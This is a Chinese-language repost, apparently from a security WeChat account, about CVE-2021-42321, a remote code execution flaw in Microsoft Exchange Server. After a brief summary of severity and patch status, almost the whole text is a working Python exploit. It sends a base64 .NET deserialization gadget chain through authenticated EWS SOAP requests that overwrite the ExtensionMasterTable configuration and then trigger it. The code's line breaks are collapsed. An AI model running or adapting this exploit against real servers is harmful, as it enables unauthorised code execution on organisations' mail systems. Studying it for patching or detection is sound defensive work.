攻击者经过身份验证后,可在受影响的机器上进行远程代码执行。此漏洞影响本地 Exchange Server,包括用户在 Exchange 混合模式下使用的服务器。该漏洞目前已发现在野利用。
该漏洞CVSS3评分:8.8 漏洞等级:高危 在野利用:是
官方已发出补丁
#!/usr/bin/pythonimport socket, timeimport httplib, requestsimport urllibimport os, sslfrom requests_ntlm2 import HttpNtlmAuthfrom urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)import base64USER = ''PASS = ''target = "https://target"#rcegadget#pop calc or mspaint on the targetgadgetData = 'AAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAgAAAA9Gb3JlZ3JvdW5kQnJ1c2gPQmFja2dyb3VuZEJydXNoAQECAAAABgMAAABtPExpbmVhckdyYWRpZW50QnJ1c2ggeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiI+PC9MaW5lYXJHcmFkaWVudEJydXNoPgYEAAAA6w08UmVzb3VyY2VEaWN0aW9uYXJ5DQp4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIg0KeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQp4bWxuczpzPSJjbHItbmFtZXNwYWNlOlN5c3RlbTthc3NlbWJseT1tc2NvcmxpYiINCnhtbG5zOmM9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkNvbmZpZ3VyYXRpb247YXNzZW1ibHk9U3lzdGVtLkNvbmZpZ3VyYXRpb24iDQp4bWxuczpyPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5SZWZsZWN0aW9uO2Fzc2VtYmx5PW1zY29ybGliIj4NCiAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJ0eXBlIiBPYmplY3RUeXBlPSJ7eDpUeXBlIHM6VHlwZX0iIE1ldGhvZE5hbWU9IkdldFR5cGUiPg0KICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgICAgICA8czpTdHJpbmc+U3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLkFwcFNldHRpbmdzLCBTeXN0ZW0uV29ya2Zsb3cuQ29tcG9uZW50TW9kZWwsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1PC9zOlN0cmluZz4NCiAgICAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCiAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJmaWVsZCIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSB0eXBlfSIgTWV0aG9kTmFtZT0iR2V0RmllbGQiPg0KICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgICAgICA8czpTdHJpbmc+ZGlzYWJsZUFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3JUeXBlQ2hlY2s8L3M6U3RyaW5nPg0KICAgICAgICAgICAgPHI6QmluZGluZ0ZsYWdzPjQwPC9yOkJpbmRpbmdGbGFncz4NCiAgICAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCiAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJzZXQiIE9iamVjdEluc3RhbmNlPSJ7U3RhdGljUmVzb3VyY2UgZmllbGR9IiBNZXRob2ROYW1lPSJTZXRWYWx1ZSI+DQogICAgICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgIDxzOk9iamVjdC8+DQogICAgICAgICAgICA8czpCb29sZWFuPnRydWU8L3M6Qm9vbGVhbj4NCiAgICAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCiAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJzZXRNZXRob2QiIE9iamVjdEluc3RhbmNlPSJ7eDpTdGF0aWMgYzpDb25maWd1cmF0aW9uTWFuYWdlci5BcHBTZXR0aW5nc30iIE1ldGhvZE5hbWUgPSJTZXQiPg0KICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgICAgICA8czpTdHJpbmc+bWljcm9zb2Z0OldvcmtmbG93Q29tcG9uZW50TW9kZWw6RGlzYWJsZUFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3JUeXBlQ2hlY2s8L3M6U3RyaW5nPg0KICAgICAgICAgICAgPHM6U3RyaW5nPnRydWU8L3M6U3RyaW5nPg0KICAgICAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPg0KICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyPg0KPC9SZXNvdXJjZURpY3Rpb25hcnk+Cw=='def sendPayload(gadgetChain):get_inbox = '''<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><t:RequestServerVersion Version="Exchange2013" /></soap:Header><soap:Body><m:GetFolder><m:FolderShape><t:BaseShape>AllProperties</t:BaseShape></m:FolderShape><m:FolderIds><t:DistinguishedFolderId Id="inbox" /></m:FolderIds></m:GetFolder></soap:Body></soap:Envelope>'''headers = {"User-Agent": "ExchangeServicesClient/15.01.2308.008", "Content-type" : "text/xml; charset=utf-8"}res = requests.post(target + "/ews/exchange.asmx",data=get_inbox,headers=headers,verify=False,auth=HttpNtlmAuth('%s' % (USER),PASS))folderId = res.content.split('<t:FolderId Id="')[1].split('"')[0]changeKey = res.content.split('<t:FolderId Id="' + folderId + '" ChangeKey="')[1].split('"')[0]delete_old = '''<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><t:RequestServerVersion Version="Exchange2013" /></soap:Header><soap:Body><m:DeleteUserConfiguration><m:UserConfigurationName Name="ExtensionMasterTable"><t:FolderId Id="%s" ChangeKey="%s" /></m:UserConfigurationName></m:DeleteUserConfiguration></soap:Body></soap:Envelope>''' % (folderId, changeKey)res = requests.post(target + "/ews/exchange.asmx",data=delete_old,headers=headers,verify=False,auth=HttpNtlmAuth('%s' % (USER),PASS))create_usr_cfg = '''<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><t:RequestServerVersion Version="Exchange2013" /></soap:Header><soap:Body><m:CreateUserConfiguration><m:UserConfiguration><t:UserConfigurationName Name="ExtensionMasterTable"><t:FolderId Id="%s" ChangeKey="%s" /></t:UserConfigurationName><t:Dictionary><t:DictionaryEntry><t:DictionaryKey><t:Type>String</t:Type><t:Value>OrgChkTm</t:Value></t:DictionaryKey><t:DictionaryValue><t:Type>Integer64</t:Type><t:Value>637728170914745525</t:Value></t:DictionaryValue></t:DictionaryEntry><t:DictionaryEntry><t:DictionaryKey><t:Type>String</t:Type><t:Value>OrgDO</t:Value></t:DictionaryKey><t:DictionaryValue><t:Type>Boolean</t:Type><t:Value>false</t:Value></t:DictionaryValue></t:DictionaryEntry><t:DictionaryEntry><t:DictionaryKey><t:Type>String</t:Type><t:Value>OrgExtV</t:Value></t:DictionaryKey><t:DictionaryValue><t:Type>Integer32</t:Type><t:Value>2147483647</t:Value></t:DictionaryValue></t:DictionaryEntry></t:Dictionary><t:BinaryData>%s</t:BinaryData></m:UserConfiguration></m:CreateUserConfiguration></soap:Body></soap:Envelope>''' % (folderId, changeKey, gadgetChain)res = requests.post(target + "/ews/exchange.asmx",data=create_usr_cfg,headers=headers,verify=False,auth=HttpNtlmAuth('%s' % (USER),PASS))get_client_ext = '''<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><t:RequestServerVersion Version="Exchange2013" /></soap:Header><soap:Body><m:GetClientAccessToken><m:TokenRequests><t:TokenRequest><t:Id>aaaa</t:Id><t:TokenType>CallerIdentity</t:TokenType></t:TokenRequest></m:TokenRequests></m:GetClientAccessToken></soap:Body></soap:Envelope>'''res = requests.post(target + "/ews/exchange.asmx",data=get_client_ext,headers=headers,verify=False,auth=HttpNtlmAuth('%s' % (USER),PASS))sendPayload(gadgetData)
原文始发于微信公众号(Khan安全攻防实验室):CVE-2021-42321 – Microsoft Exchange Server 远程代码执行漏洞
